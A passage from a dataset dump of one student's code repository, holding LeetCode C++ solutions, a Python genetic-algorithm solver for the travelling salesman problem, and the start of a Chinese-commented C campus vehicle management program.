如果找不到更小的dist[],说明不连通,如果找到,则标记 visit[u]为 true\r\n if(u == -1) return;\r\n visit[u] = true;\r\n\r\n // (4).在判定计算最短距离后更新最短路径条数\r\n for(int k = 0;k < MAX;k++)\r\n {\r\n if(!visit[k] && Graph[u][k] != INT_MAX)\r\n {\r\n if(dist[u] + Graph[u][k] < dist[k])\r\n {\r\n dist[k] = dist[u] + Graph[u][k];\r\n roadNum[k] = roadNum[u];\r\n }\r\n else if(dist[u] + Graph[u][k] == dist[k])\r\n {\r\n roadNum[k] = roadNum[k] + roadNum[u];\r\n }\r\n }\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.4045138955116272, "alphanum_fraction": 0.4149305522441864, "avg_line_length": 23.130434036254883, "blob_id": "464c735279187bfe7f19fa980532a30569e74a95", "content_id": "0ab36f214c9094317620621a94ef11484f06d70a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 588, "license_type": "no_license", "max_line_length": 61, "num_lines": 23, "path": "/leetcode/leetcode14.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 14.最长公共子串\r\n\r\nclass Solution {\r\npublic:\r\n string longestCommonPrefix(vector<string>& strs) {\r\n if(strs.size() == 0) return \"\";\r\n string res = \"\", first = strs[0];\r\n char c;\r\n for(int i = 0;i < first.length();i++){\r\n c = first[i];\r\n for(int j = 1;j < strs.size();j++){\r\n if(i == strs[j].length() || strs[j][i] != c){\r\n return res;\r\n }\r\n }\r\n res += c;\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.4541501998901367, "alphanum_fraction": 0.47648221254348755, "avg_line_length": 25.351350784301758, "blob_id": "51a4edb2743f0c0e6d6d619781fe659ef3d3e9a1", "content_id": "cf0bfe46eab98ae23ba35954b7132d4f31fd562f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5463, "license_type": "no_license", "max_line_length": 116, "num_lines": 185, "path": "/python/TSP_GA.py", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# 个体类\r\nclass Indv:\r\n # 传入个体的基因\r\n def __init__(self, gene):\r\n self.gene = gene\r\n self.score = -1\r\n\r\n\r\nclass GA:\r\n def __init__(self, Pc, Pm, indvNums, scoreFunc, geneLength):\r\n '''\r\n :param Pc: 交叉概率\r\n :param Pm: 变异概率\r\n :param indvNums: 个体数量\r\n :param scoreFunc: 适应度函数\r\n :param geneLength: 基因长度\r\n '''\r\n self.Pc = Pc\r\n self.Pm = Pm\r\n self.indvNums = indvNums\r\n self.scoreFunc = scoreFunc\r\n self.geneLength = geneLength\r\n\r\n self.Groups = []\r\n self.t = 0\r\n self.Optimal = None\r\n self.crossNums = 0\r\n self.mutationNums = 0\r\n self.scoreSum = 0.0\r\n\r\n self.initialize()\r\n\r\n def initialize(self):\r\n self.Groups = []\r\n for i in range(self.indvNums):\r\n # 1. gene = [0,1,2...genelength]\r\n gene = [i for i in range(self.geneLength)]\r\n # 2. 打乱 gene\r\n np.random.shuffle(gene)\r\n # 3. 新个体\r\n indv = Indv(gene)\r\n self.Groups.append(indv)\r\n\r\n # 计算适应度\r\n def fitness(self):\r\n # 1. 初始化\r\n self.scoreSum = 0.0\r\n self.Optimal = self.Groups[0]\r\n for indv in self.Groups:\r\n # 2. 计算个体适应度\r\n indv.score = self.scoreFunc(indv)\r\n self.scoreSum += indv.score\r\n # 3. 更新最优个体\r\n if self.Optimal.score > indv.score:\r\n self.Optimal = indv\r\n\r\n # 交叉\r\n def cross(self, dad, mom):\r\n son, position = [], 0\r\n # 1. 确定交叉片段位置\r\n index1 = np.random.randint(0, self.geneLength - 1)\r\n index2 = np.random.randint(0, self.geneLength - 1)\r\n segment = mom.gene[index1: index2]\r\n for x in dad.gene:\r\n # 2. 
到达交叉起点\r\n if position == index1:\r\n son.extend(segment)\r\n position += 1\r\n # 3. 其它情况,直接将基因插入子代 gene\r\n if x not in son:\r\n son.append(x)\r\n position += 1\r\n self.crossNums += 1\r\n return son\r\n\r\n # 变异\r\n def mutation(self, gene):\r\n son = gene[:]\r\n # 1. 确定变异点\r\n index1 = np.random.randint(0, self.geneLength - 1)\r\n index2 = np.random.randint(0, self.geneLength - 1)\r\n # 2. 交换两点基因\r\n son[index1], son[index2] = son[index2], son[index1]\r\n self.mutationNums += 1\r\n return son\r\n\r\n # 选择\r\n def select(self):\r\n # 1. 利用总适应度选择\r\n s = np.random.uniform(0, self.scoreSum)\r\n for indv in self.Groups:\r\n s -= indv.score\r\n if s <= 0:\r\n return indv\r\n raise Exception(\"Error\", self.scoreSum)\r\n\r\n # 产生新子代\r\n def generate(self):\r\n dad = self.select()\r\n # 1. 交叉\r\n P = np.random.random()\r\n if P < self.Pc:\r\n mom = self.select()\r\n gene = self.cross(dad, mom)\r\n else:\r\n gene = dad.gene\r\n # 2. 变异\r\n P = np.random.random()\r\n if P < self.Pm:\r\n gene = self.mutation(gene)\r\n return Indv(gene)\r\n\r\n # 产生新种群\r\n def evolve(self):\r\n # 1. 计算适应度\r\n self.fitness()\r\n # 2. 新一代\r\n groups = [self.Optimal]\r\n # 3. 产生新子代\r\n while len(groups) < self.indvNums:\r\n groups.append(self.generate())\r\n # 4. 更新种群\r\n self.Groups = groups\r\n self.t += 1\r\n\r\n\r\nclass TSP:\r\n def __init__(self, indvNums):\r\n self.indvNums = indvNums\r\n self.initialize()\r\n self.ga = GA(Pc=0.7, Pm=0.1, indvNums=self.indvNums, geneLength=len(self.sites), scoreFunc=self.scoreFunc())\r\n\r\n # 初始化\r\n def initialize(self):\r\n self.sites = []\r\n # 随机生成点\r\n for i in range(100):\r\n x = np.random.randint(0, 200)\r\n y = np.random.randint(0, 200)\r\n self.sites.append((x, y))\r\n\r\n # 计算某基因(路径)的总距离\r\n # 适应度函数\r\n def distance(self, gene):\r\n dist = 0.0\r\n for i in range(-1, len(self.sites) - 1):\r\n index1, index2 = gene[i], gene[i + 1]\r\n site1, site2 = self.sites[index1], self.sites[index2]\r\n # 欧式距离\r\n dist += np.sqrt(pow(site1[0] - site2[0], 2) + pow(site1[1] - site2[1], 2))\r\n return dist / 1000\r\n\r\n def scoreFunc(self):\r\n return lambda indv: self.distance(indv.gene)\r\n\r\n # 运行函数\r\n def run(self, T=0):\r\n res, n = [], 0\r\n # 1. 判断终止条件\r\n while n < T:\r\n # 2. 生成新种群\r\n self.ga.evolve()\r\n # 3. 计算当前迭代最优结果\r\n dist = self.distance(self.ga.Optimal.gene)\r\n print(f'{self.ga.t} : {round(dist, 5)}')\r\n res.append(dist)\r\n n += 1\r\n self.display(res, T)\r\n\r\n # 结果可视化\r\n def display(self, res, T):\r\n plt.plot(range(T), res, color='lightcoral')\r\n plt.title(\"iteration - score\", color='r')\r\n plt.xlabel(\"iteration\")\r\n plt.ylabel(\"score ×10^3\")\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n tsp = TSP(100)\r\n tsp.run(500)\r\n" }, { "alpha_fraction": 0.3672390878200531, "alphanum_fraction": 0.4095112383365631, "avg_line_length": 26.11111068725586, "blob_id": "525150fd7544595c014023d1e274e9a323da41af", "content_id": "7888d61cbd8e4e16be7498bcecbfde41a97fea02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 771, "license_type": "no_license", "max_line_length": 68, "num_lines": 27, "path": "/leetcode/leetcode16_10.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 面试题 16.10. 
生存人数\r\n\r\nclass Solution {\r\npublic:\r\n int maxAliveYear(vector<int>& birth, vector<int>& death) {\r\n int live[101] = {0};\r\n int MAX_year = 0, MAX_nums = 0;\r\n\r\n for (int i = 0; i < birth.size(); i++)\r\n {\r\n int start = birth[i], end = death[i];\r\n for(int j = start-1900;j <= end-1900;j++){\r\n live[j] += 1;\r\n if(live[j] > MAX_nums){\r\n MAX_year = j + 1900;\r\n MAX_nums = live[j];\r\n } else if(live[j] == MAX_nums && j+1900 < MAX_year){\r\n MAX_year = j + 1900;\r\n }\r\n }\r\n }\r\n return MAX_year;\r\n }\r\n};" }, { "alpha_fraction": 0.44312795996665955, "alphanum_fraction": 0.4620853066444397, "avg_line_length": 21.55555534362793, "blob_id": "4b925bb4eba036cfe42971b537d3457ab6f1947e", "content_id": "57854e7f66640a28f0d73457bdae14f22cc96966", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 436, "license_type": "no_license", "max_line_length": 79, "num_lines": 18, "path": "/leetcode/leetcode1800.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 1800. 最大升序子数组\r\n\r\nclass Solution {\r\npublic:\r\n int maxAscendingSum(vector<int>& nums) {\r\n int p = 0, res = 0;\r\n while (p < nums.size()){\r\n int temp = nums[p];\r\n while (p < nums.size()-1 && nums[p+1] > nums[p]) temp += nums[++p];\r\n res = max(res, temp);\r\n p++;\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.2758132815361023, "alphanum_fraction": 0.2927864193916321, "avg_line_length": 24.259260177612305, "blob_id": "2226d821d5317ffacd92a73d1335c34f560e98ed", "content_id": "045570a219a5c583dff8f2d7b9b35678212e2077", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 719, "license_type": "no_license", "max_line_length": 62, "num_lines": 27, "path": "/leetcode/leetcode1576.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 1576.替换所有问号\r\n\r\nclass Solution {\r\npublic:\r\n string modifyString(string s) {\r\n char a = 'a';\r\n for(int i = 0; i < s.length(); i++){\r\n if(s[i] == '?'){\r\n int k = 0;\r\n if(i == 0){\r\n while (a+k == s[i+1]) k++;\r\n s[i] = a + k;\r\n } else if(i == s.length()-1){\r\n while (a+k == s[i-1]) k++;\r\n s[i] = a + k;\r\n } else {\r\n while(a+k == s[i-1] || a+k == s[i+1]) k++;\r\n s[i] = a + k;\r\n }\r\n }\r\n }\r\n return s;\r\n }\r\n};" }, { "alpha_fraction": 0.4261796176433563, "alphanum_fraction": 0.4292237460613251, "avg_line_length": 23.269229888916016, "blob_id": "ba9aecbb6ffb7de84f78578ddc7ef41acb316ce7", "content_id": "40b9b516856045a5ee266e88f2c5a794941ef49b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 677, "license_type": "no_license", "max_line_length": 57, "num_lines": 26, "path": "/leetcode/leetcode1.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 1.两数之和\r\n\r\nclass Solution {\r\npublic:\r\n vector<int> twoSum(vector<int>& nums, int target) {\r\n map<int, int> mp; // first是值,second是索引\r\n vector<int> res;\r\n int pair;\r\n for (int i = 0; i < nums.size(); i++)\r\n {\r\n pair = target - nums[i];\r\n map<int, int>::iterator iter = mp.find(pair);\r\n if(iter != mp.end()){\r\n res.push_back(iter->second);\r\n res.push_back(i);\r\n break;\r\n } else {\r\n mp[nums[i]] = i;\r\n }\r\n }\r\n return res;\r\n }\r\n};\r\n" }, { "alpha_fraction": 
0.38494935631752014, "alphanum_fraction": 0.40086829662323, "avg_line_length": 22.75, "blob_id": "e74cdd13d96c1e7e23cd27d6bb32f873bd5a6431", "content_id": "2510fa7ba3bf0cc386baf27be7eeeab50a995462", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 699, "license_type": "no_license", "max_line_length": 57, "num_lines": 28, "path": "/leetcode/leetcode1447.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 1447.最简分数\r\n\r\nclass Solution {\r\npublic:\r\n vector<string> simplifiedFractions(int n) {\r\n vector<string> vec;\r\n if(n == 1) return vec;\r\n string temp;\r\n for(int i = 2;i <= n;i++){\r\n for(int j = 1;j < i;j++){\r\n if(j == 1 || check(j, i)){\r\n temp = to_string(j)+'/'+to_string(i);\r\n vec.push_back(temp);\r\n }\r\n }\r\n }\r\n return vec;\r\n }\r\n bool check(int a, int b){\r\n for(int i = 2;i <= a;i++){\r\n if(a % i == 0 && b % i == 0) return false;\r\n }\r\n return true;\r\n }\r\n};" }, { "alpha_fraction": 0.3242603540420532, "alphanum_fraction": 0.35384616255760193, "avg_line_length": 19.174999237060547, "blob_id": "f6600897445003d5af3cc8a217a28f4c836e4a0d", "content_id": "5890affa91840d03705feaf94d231d806aba1d04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 859, "license_type": "no_license", "max_line_length": 56, "num_lines": 40, "path": "/leetcode/leetcode13.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 13.罗马数字转整数\r\n\r\nclass Solution {\r\npublic:\r\n int romanToInt(string s) {\r\n int res = 0;\r\n for(int i = s.size()-1; i >= 0; i--){\r\n if(i != 0 && values(s[i]) > values(s[i-1])){\r\n res += (values(s[i]) - values(s[i-1]));\r\n i--;\r\n } else {\r\n res += values(s[i]);\r\n }\r\n }\r\n return res;\r\n }\r\n\r\n int values(char c) {\r\n switch (c){\r\n case 'I':\r\n return 1;\r\n case 'V':\r\n return 5;\r\n case 'X':\r\n return 10;\r\n case 'L':\r\n return 50;\r\n case 'C':\r\n return 100;\r\n case 'D':\r\n return 500;\r\n case 'M':\r\n return 1000;\r\n }\r\n return 0;\r\n }\r\n};" }, { "alpha_fraction": 0.4258679747581482, "alphanum_fraction": 0.46061599254608154, "avg_line_length": 19.92751693725586, "blob_id": "3a05376e14e3dd81ec5d177a11cf7c64172d4fbc", "content_id": "a5ce1f5e263e22532a2c38c7f1dbce2a442c4e7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 39281, "license_type": "no_license", "max_line_length": 161, "num_lines": 1559, "path": "/C/双学位C语言/Cpp1.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<stdio.h>\r\n#include<cstring>\r\n#include<stdlib.h>\r\n#include<ctype.h>\r\n#include<math.h>\r\n#include <algorithm>\r\n#define MAX 1000\r\n//**************************************** paramster\r\nstruct USER // 定义用户结构体\r\n{\r\n\tchar id[7]; // 用户编号\r\n\tchar card[5]; // 卡类型\r\n\tlong valid; //有效期/次数\r\n\tchar carid1[7]; //车牌号1\r\n\tchar carid2[7]; //车牌号2\r\n\tchar car1in[13]; //车1入场时间\r\n\tchar car2in[13]; //车2入场时间\r\n}user[MAX];\r\n\r\n//定义月份数组,用于计算天数\r\nint month[13][2]={{0,0},{31,31},{28,29},{31,31},{30,30},{31,31},{30,30},{31,31},{31,31},{30,30},{31,31},{30,30},{31,31}};\r\n//**************************************** function\r\nvoid showmenu();\r\nvoid save(int);\r\nvoid creat();\r\nvoid display();\r\nvoid add();\r\nvoid modify();\r\nvoid carin();\r\nvoid carout();\r\nvoid 
sort();\r\n//**************************************** main function\r\nint main()\r\n{\r\n\tint select,flag,e;\r\n\tshowmenu();\r\n\tprintf(\"请输入您要进行的操作:\");\r\n\tscanf(\"%d\",&select);\r\n\tprintf(\"\\n\"); \r\n\tdo\t\t\t\t\t\t\t\t\t\t//指令选择\r\n\t{\r\n\t\tif(select>=1&&select<=8)\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tflag=0;\r\n\t\t\tprintf(\"input error.choose again.\\n\");\r\n\t\t}\r\n\t}while(!flag);\r\n\twhile(flag) //指令执行\r\n\t{ \r\n\t\tswitch(select)\r\n\t\t{\r\n\t\tcase 1:\r\n\t\t\tprintf(\"创建记录会导致原有记录全部清空,确定继续操作吗(1/0)?\");\r\n\t\t\tscanf(\"%d\",&e);\r\n\t\t\tif(e==1){\r\n\t\t\t\tcreat();\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tadd();\r\n\t\t\tbreak;\r\n\t\t\tcase 3:\r\n\t\t\tdisplay();\r\n\t\t\tbreak;\r\n\t\tcase 4:\r\n\t\t\tcarin();\r\n\t\t\tbreak;\r\n\t\tcase 5:\r\n\t\t\tcarout();\r\n\t\t\tbreak;\r\n\t\tcase 6:\r\n\t\t\tmodify();\r\n\t\t\tbreak;\r\n\t\tcase 7:\r\n\t\t\tsort();\r\n\t\t\tbreak;\r\n\t\tcase 8:\r\n\t\t\texit(0); //exit(0):程序正常运行并退出 \r\n\t\t\tbreak;\r\n\t\tdefault:break;\r\n\t\t};\r\n\t\tprintf(\"\\n\");\r\n\t\tprintf(\"是否继续操作?(1/0):\");\r\n\t\tscanf(\"%d\",&e);\r\n\t\tif(e==1)\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tsystem(\"cls\");\r\n\t\t\tshowmenu();\r\n\t\t\tprintf(\"请输入您要进行的操作: \");\r\n\t\t\tscanf(\"%d\",&select);\r\n\t\t\tprintf(\"\\n\");\r\n\t\t}\r\n\t\telse\r\n\t\t\tflag=0;\r\n\t};\r\n\tprintf(\"*****感谢您的使用。*****\\n\");\r\n\tprintf(\"\\n\");\r\n\treturn 0;\r\n};\r\n//**************************************** functions \r\n\r\nvoid showmenu() //指令菜单\r\n{\r\n\tprintf( \"====== 校园车辆管理系统 ======\\n\" );\r\n\tprintf(\"======\\t1、创建记录\\t======\\n\");\r\n\tprintf(\"======\\t2、添加记录\\t======\\n\");\r\n\tprintf(\"======\\t3、浏览记录\\t======\\n\");\r\n\tprintf (\"======\\t4、车辆进入\\t======\\n\");\r\n\tprintf (\"======\\t5、车辆离开\\t======\\n\");\r\n\tprintf(\"======\\t6、修改记录\\t======\\n\");\r\n\tprintf (\"======\\t7、排序显示\\t======\\n\");\r\n\tprintf (\"======\\t8、离开系统\\t======\\n\");\r\n\tprintf (\"==============================\\n\") ;\r\n\tprintf(\"如要退出系统,请保存信息!\\n\");\r\n};\r\n\r\nvoid save(int m){ //保存信息\r\n\tint i;\r\n\tFILE* fp;\r\n\tif((fp=fopen(\"car.txt\",\"wb\"))==NULL)\r\n\t{\r\n\t\tprintf(\"cannot open file\\n\");\r\n\t\texit(0);\r\n\t}\r\n\tfor(i=0;i<m;i++)\t\r\n\t\tif(fwrite(&user[i],sizeof(struct USER),1,fp)!=1)\r\n\t\t\tprintf(\"file write error\\n\");\r\n\tfclose(fp);\t\r\n}\r\n\r\nint load(){ //载入信息\r\n\tFILE* fp;\r\n\tint i=0;\r\n\tif((fp=fopen(\"car.txt\",\"rb\"))==NULL)\r\n\t{\r\n\t\tprintf(\"cannot open file\\n\");\r\n\t\texit(0);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tdo\r\n\t\t{\r\n\t\t\tfread(&user[i],sizeof(struct USER),1,fp);\r\n\t\t\ti++;\r\n\t\t}\r\n\t\twhile(feof(fp)==0);\r\n\t}\r\n\tfclose(fp);\r\n\treturn(i-1);\r\n};\r\n\r\nbool isFull(){ // 判断是否已满\r\n int m = load();\r\n if (m == MAX) {return true;}\r\n return false;\r\n}\r\n\r\nvoid display(){ //展示信息\r\n\tint i;\r\n\tint m=load();\r\n\tfor(i=0;i<m;i++)\r\n\t\tprintf(\"\\t%s\\t,\\t%s\\t,\\t%d\\t,\\t%s\\t,\\t%s\\t,\\t%s\\t,\\t%s\\t\\n\",user[i].id,user[i].card,user[i].valid,user[i].carid1,user[i].carid2,user[i].car1in,user[i].car2in);\r\n};\t\t\t\r\n\r\nvoid creat() //创建新信息数据\r\n{\r\n\tint i,j,m,flag,k;\r\n\tchar uid[7],cid1[7],cid2[7],today[7],va[7],tcard[5];\r\n\tlong time,v;\r\n\tdo\t\t\t\t\t\t\t\t\t\t//判断输入是否符合要求:位数,数字\r\n\t{\r\n\t\tflag=1;\r\n\t\tprintf(\"请输入今日日期(例190212): \");\r\n\t\tscanf(\"%s\",&today);\r\n\t\tif(strlen(today)!=6)\r\n\t\t\tflag=0;\r\n\t\tfor(k=0;today[k]!='\\0' && 
flag;k++)\r\n\t\t\tif(isdigit(today[k])==0) // 判断日期格式是否为数字:isdigit\r\n\t\t\t\tflag=0;\r\n\t}while(!flag);\r\n\ttime=atol(today); //将时间转化为数字形式:atol\r\n\r\n\tdo \r\n\t{\r\n printf(\"输入创建用户数(1000以内):\");\r\n scanf(\"%d\", &m);\r\n }while(m>1000);\r\n\r\n\tfor(i=0;i<m;i++)\r\n\t{\r\n\t\tdo //录入用户id\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tdo //判断用户id是否合理\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"请输入由字母与数字组成的6位用户ID:\");\r\n\t\t\t\tscanf(\"%s\",&uid);\r\n\t\t\t\tif(strlen(uid)!=6)\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\tfor(k=0;uid[k]!='\\0' && flag;k++)\r\n\t\t\t\t\tif(isalnum(uid[k])==0) //判断用户id是否为字母与数字:isalnum\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t}while(!flag);\r\n\t\t\tfor(j=0;j<i && flag;j++) //用户id查重\r\n\t\t\t{\r\n\t\t\t\tif((strcmp(user[j].id,uid))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"该用户已存在,请重新输入:\");\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}while(!flag);\r\n\r\n\t\tdo //录入第一辆车\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tdo //判断车牌是否合理:不为0;字母与数字组合\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"请输入由字母与数字组成的车牌号:\");\r\n\t\t\t\tscanf(\"%s\",&cid1);\t\r\n\t\t\t\tif((strcmp(cid1,\"0\"))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"用户至少有一辆车!\");\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\t};\r\n\t\t\t\tfor(k=0;cid1[k]!='\\0' && flag;k++)\r\n\t\t\t\t{\r\n\t\t\t\t\tif(isalnum(cid1[k])==0)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}\r\n\t\t\t}while(!flag);\r\n\t\t\tfor(j=0;j<i && flag;j++) //车牌查重\r\n\t\t\t{\r\n\t\t\t\tif((strcmp(user[j].carid1,cid1))==0 || (strcmp(user[j].carid2,cid1))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"该车已存在!\");\r\n\t\t\t flag=0;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}while(!flag);\r\n\r\n\t\tdo //录入第二辆车,操作同一\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tdo \r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"若有第二辆车,请输入由字母与数字组成的车牌号,若没有请输入0:\");\r\n\t\t\t\tscanf(\"%s\",&cid2);\r\n\t\t\t\tfor(k=0;cid2[k]!='\\0' && flag;k++)\r\n\t\t\t\t\tif(isalnum(cid2[k])==0)\r\n\t\t\t\t\t\tflag=0;\r\n\r\n\t\t\t\tif(strcmp(cid1,cid2)==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"该车牌号已经输入过了!请重新输入: \");\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\t};\r\n\t\t\t}while(!flag);\r\n\r\n\t\t\tif(strcmp(cid2,\"0\")!=0)\r\n\t\t\t\tfor(j=0;j<i;j++)\r\n\t\t\t\t\tif((strcmp(user[j].carid2,cid2))==0 || (strcmp(user[j].carid1,cid2))==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"该车已存在!\");\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t}\r\n\t\t}while(!flag);\r\n\r\n\t\tif(flag) //录入有效期并写入文件\r\n\t\t{\r\n\t\t\tstrcpy(user[i].id,uid);\r\n\t\t\tstrcpy(user[i].carid1,cid1);\r\n\t\t\tstrcpy(user[i].carid2,cid2);\r\n\r\n\t\t\tdo //有效期录入\r\n\t\t\t{\r\n\t\t\t\tprintf(\"卡类型(year/time):\");\r\n\t\t\t\tscanf(\"%s\",tcard);\r\n\r\n\t\t\t\tif((strcmp(tcard,\"year\"))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tdo \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\tprintf(\"请输入有效使用期:\");\r\n\t\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\t\tif(strlen(va)!=6)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\t\tv=atol(va);\r\n\t\t\t\t\t\tif(v<=time) //有效期与今日时间对比\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tuser[i].valid=v;\r\n\t\t\t\t\tstrcpy(user[i].card,\"year\");\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\telse if((strcmp(tcard,\"time\"))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\tprintf(\"请输入有效次数(一次性输入最大使用次数为30):\");\r\n\t\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++) 
//先判断输入是否为数字\r\n\t\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\t\t\tv=atoi(va);\r\n\t\t\t\t\t\t\t\tif(v>30 || v<=0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tuser[i].valid=v;\r\n\t\t\t\t\tstrcpy(user[i].card,\"time\");\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}while(flag);\r\n\r\n\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\tif((strcmp(user[i].carid2,\"0\"))==0)\r\n\t\t\t\tstrcpy(user[i].car2in,\"无车辆\");\r\n\t\t\tprintf(\"\\n\");\r\n\t\t};\r\n\t};\r\n\tprintf(\"OK!\");\r\n\tsave(m);\r\n};\r\n\r\nvoid add() //添加信息\r\n{ //add函数的所有添加,验证,容错功能都与creat相同\r\n\tFILE* fp;\r\n\tint n,i,j,flag,k,count=0;\r\n\tint m=load();\r\n\tchar uid[7],ucid1[7],ucid2[7],t[7],va[7],tcard[5];\r\n\tlong time,v;\r\n\r\n\tif (isFull()){printf(\"用户已满,不能添加!\");return;} // 判断是否达到容量上限\r\n\r\n\tdo //日期输入\r\n\t{\r\n\t\tflag=1;\r\n\t\tprintf(\"请输入今日日期(例190212): \");\r\n\t\tscanf(\"%s\",&t);\r\n\t\tif(strlen(t)!=6)\r\n\t\t\tflag=0;\r\n\t\tfor(k=0;t[k]!='\\0' && flag;k++)\r\n\t\t\tif(isdigit(t[k])==0)\r\n\t\t\t\tflag=0;\r\n\t}while(!flag);\r\n\ttime=atol(t);\r\n\r\n\tfp=fopen(\"car.txt\",\"a\");\r\n\tdo{\r\n\t\tprintf(\"现在已有%d个用户,最多还可添加%d个用户,要添加几个?\",m,1000-m);\r\n\t\tscanf(\"%d\",&n);\r\n\t}while(n+m>1000);\r\n\tfor(i=m;i<(m+n);i++)\r\n\t{\r\n\t\tdo\t\t\t\t\t\t\t\t\t\t\t//录入用户id并检查是否合理\r\n\t\t{\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"请输入由字母与数字组成的用户ID:\");\r\n\t\t\t\tscanf(\"%s\",&uid);\r\n\t\t\t\tif(strlen(uid)!=6)\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\tfor(k=0;uid[k]!='\\0' && flag;k++)\r\n\t\t\t\t\tif(isalnum(uid[k])==0)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t}while(!flag);\r\n\t\t for(j=0;j<i && flag;j++)\r\n\t\t\t{\r\n\t\t\t\tif((strcmp(user[j].id,uid))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"该用户已存在!\");\r\n\t\t\t flag=0;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}while(!flag);\r\n\r\n\t\tdo\t\t\t\t\t\t\t\t\t// 